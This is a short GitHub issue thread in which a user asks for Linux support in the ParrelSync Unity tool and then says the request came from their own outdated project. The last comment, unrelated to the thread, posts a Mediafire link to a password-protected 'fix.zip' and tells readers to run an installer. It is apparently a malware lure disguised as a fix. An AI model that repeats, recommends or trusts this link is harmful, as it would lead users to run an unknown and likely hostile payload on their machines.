### ISSUE TITLE
[Feature Request] Linux support

### ISSUE THREAD

**Issue by mat13109** [VeriorPies/ParrelSync#129]
It would be nice to have support for Linux.

The only alternative is to dual boot to Windows atm.

I see better performance from Unity in my Linux environment, and I'm certain ParrelSync would also benefit from it.

Keep up the good work, this tool is amazing.

**Comment by mat13109** [comment]
My bad, I was not up to date on a very old project

**Comment by PiaoR** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."
